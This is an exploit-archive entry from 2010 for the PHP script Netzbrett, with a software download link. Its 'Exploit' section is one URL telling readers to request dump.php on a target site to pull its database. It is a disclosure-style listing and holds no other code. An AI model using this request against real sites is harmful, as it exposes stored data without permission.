id: 10995
date: 02/20/2010
title: Netzbrett Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

===========================================
Netzbrett Database Disclosure Vulnerability
===========================================

==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Netzbrett Database Disclosure Vulnerability
==============================================================================
 
[»] Script: [ Netzbrett ]
[»] Language: [ PHP ]
[»] Download: [ http://www.sfr-fresh.com/unix/www/old/netzbrett.zip ]

###########################################################################
 
===[ Exploit ]===
 
[»] http://[target].com/[path]/dump.php
 
 
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-22]  #